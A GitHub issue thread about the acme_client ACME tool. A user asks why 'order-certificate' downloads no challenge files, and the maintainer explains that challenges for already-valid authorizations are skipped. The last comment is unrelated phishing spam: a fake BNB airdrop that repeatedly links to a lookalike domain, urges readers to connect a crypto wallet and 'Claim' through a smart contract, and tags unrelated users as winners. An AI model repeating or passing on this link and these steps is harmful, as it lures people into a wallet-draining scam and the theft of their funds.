### ISSUE TITLE
order-certificate does not download challenges

### ISSUE THREAD

**Issue by IgelCampus** [porunov/acme_client#12]
When following the wiki tutorial acme_client does not download the challenge files when renewing a certificiate. I am running the following commands:

    ACMECLIENT="java -jar acme_client.jar -w . --log-dir . --log-level TRACE"
    $ACMECLIENT -a ./cert/account.key -c ./cert/$DOMAIN.csr --command order-certificate --well-known-dir ./challenge --one-dir-for-well-known

After the command acme_client returns `{"status":"ok"}` but the specified challenge directory is empty. The trace logfile is attached, but I cannot see any error listed
[acme.log](https://github.com/porunov/acme_client/files/2667147/acme.log)
.

**Comment by porunov** [comment]
You HTTP-1 challenge is verified and expires 2019-01-10 10:26:05. You can skip this step and go to the next one. Your authorization is also verified. For valid authorizations I've disabled a challenge downloading as there is no sense to validate them again. Notice, `order-certificate` command doesn't return challenges of valid authorizations. Authorizations **may** be valid already in some situations, even for new orders (depends on the CA provider).

**Comment by IgelCampus** [comment]
Thank you for the clarification. Would it make sense to add this to the docs for order-certificate and the wiki page for renewing a certificate?

**Comment by porunov** [comment]
Yes, I think it makes sense. I will add this information a little bit later.

**Comment by Renyu106** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @fraktar, @electr0Nik, @fandeus, @GiftofHermes, @hereisadi, @beshan, @nazifmehmetoglu
